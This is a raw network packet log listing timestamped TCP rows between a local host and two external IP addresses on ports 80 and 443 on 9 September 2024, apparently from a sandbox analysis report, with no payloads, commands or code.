Sep 9, 2024 17:49:04.625696898 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.625706911 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.625716925 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.625718117 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.625725031 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.625729084 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.625735998 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.625740051 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.625751972 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.625761032 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.625782013 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.634083033 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634124041 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634134054 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634146929 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.634169102 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.634175062 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.634257078 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634268045 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634278059 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634289980 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634296894 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.634310007 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.634335995 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.634412050 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634450912 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.634478092 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634490013 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.634510994 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.634527922 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.635234118 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.635277033 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.635278940 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.635292053 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.635313988 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.635327101 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.635365009 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.635428905 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.635471106 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.635483980 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.635519981 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.636266947 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.636305094 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.636337996 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.636351109 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.636373997 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.636387110 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.636461973 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.636475086 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.636487961 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.636503935 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.636517048 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.637033939 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637078047 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.637094975 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637108088 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637128115 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.637140989 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.637173891 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637212992 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.637629986 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637674093 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.637728930 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637742996 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637769938 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.637782097 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.637814999 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637826920 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637839079 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.637855053 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.637865067 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.638823032 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.638833046 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.638859034 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.638865948 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.638870955 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.638879061 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.638886929 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.638890982 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.638900995 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.638912916 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.638917923 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.638936996 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.639575005 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.639605045 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.639616013 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.639626026 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.639640093 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.639648914 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.639771938 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.639784098 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.639796019 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.639813900 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.639827013 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.640499115 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.640544891 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.640544891 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.640557051 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.640579939 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.640593052 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.640985012 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.641021013 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.641062975 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.641097069 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643208027 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643249035 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643251896 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643265963 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643287897 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643301010 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643410921 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643421888 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643435001 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643448114 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643454075 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643466949 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643481970 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643611908 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643623114 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643634081 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643667936 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643667936 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643734932 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643745899 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643757105 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643767118 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643774033 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643778086 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643789053 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.643790960 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643795967 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643810987 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643825054 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.643994093 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.644038916 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.644077063 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.644114971 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.644309998 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.644320011 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.644350052 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.644516945 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.644537926 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.644562960 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.644576073 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.644798040 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.644841909 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.644886017 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.644896030 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.644937038 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.644948959 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.645015001 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.645025015 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.645035982 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.645051956 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.645066023 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.645730972 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.645767927 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.645934105 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.645951986 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.645979881 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.645994902 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.646038055 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.646049976 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.646059036 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.646070004 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.646080017 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.646092892 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.646106005 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.646933079 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.646975994 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.646979094 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.646991968 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.647015095 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.647027016 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.647059917 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.647070885 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.647079945 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.647094965 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.647109985 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.648345947 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.648363113 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.648385048 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.648401022 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679219961 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679259062 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679266930 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679342031 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679353952 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679366112 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679377079 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679394007 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679416895 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679418087 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679418087 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679444075 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679585934 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679596901 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679605961 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679627895 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679641008 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679790020 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679800987 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679811954 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679824114 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.679831028 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679842949 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.679857016 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680075884 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680087090 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680095911 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680105925 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680115938 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680128098 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680481911 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680493116 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680501938 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680511951 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680521011 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680525064 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680532932 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680545092 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680542946 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680555105 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680557966 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680577993 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680593014 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680697918 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680707932 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680716991 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680726051 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680735111 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680737972 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680747986 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680748940 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.680767059 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.680784941 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.682276011 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.682324886 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.682329893 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.682337046 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.682362080 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.682374954 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.682508945 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:04.682548046 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:04.682996988 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:09.542867899 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:09.542917013 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:09.542968988 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:09.551661015 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:09.551685095 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:09.831051111 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:49:09.831161022 CEST | 49167 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:49:10.149262905 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.149349928 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.154130936 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.154155016 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.154617071 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.213083029 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.255410910 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.457333088 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.457370996 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.457381964 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.457392931 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.457406998 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.457420111 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.457428932 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.457431078 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.457443953 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.457468033 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.457489014 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.460474968 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.479486942 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.479520082 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.479537964 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.479562998 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.479581118 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.522422075 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.522459984 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.522485018 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.522511959 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.522528887 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.522528887 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.522579908 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.565537930 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.565568924 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.565613031 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
Sep 9, 2024 17:49:10.565635920 CEST | 443 | 49168 | 207.241.227.96 | 192.168.2.22
Sep 9, 2024 17:49:10.565650940 CEST | 49168 | 443 | 192.168.2.22 | 207.241.227.96
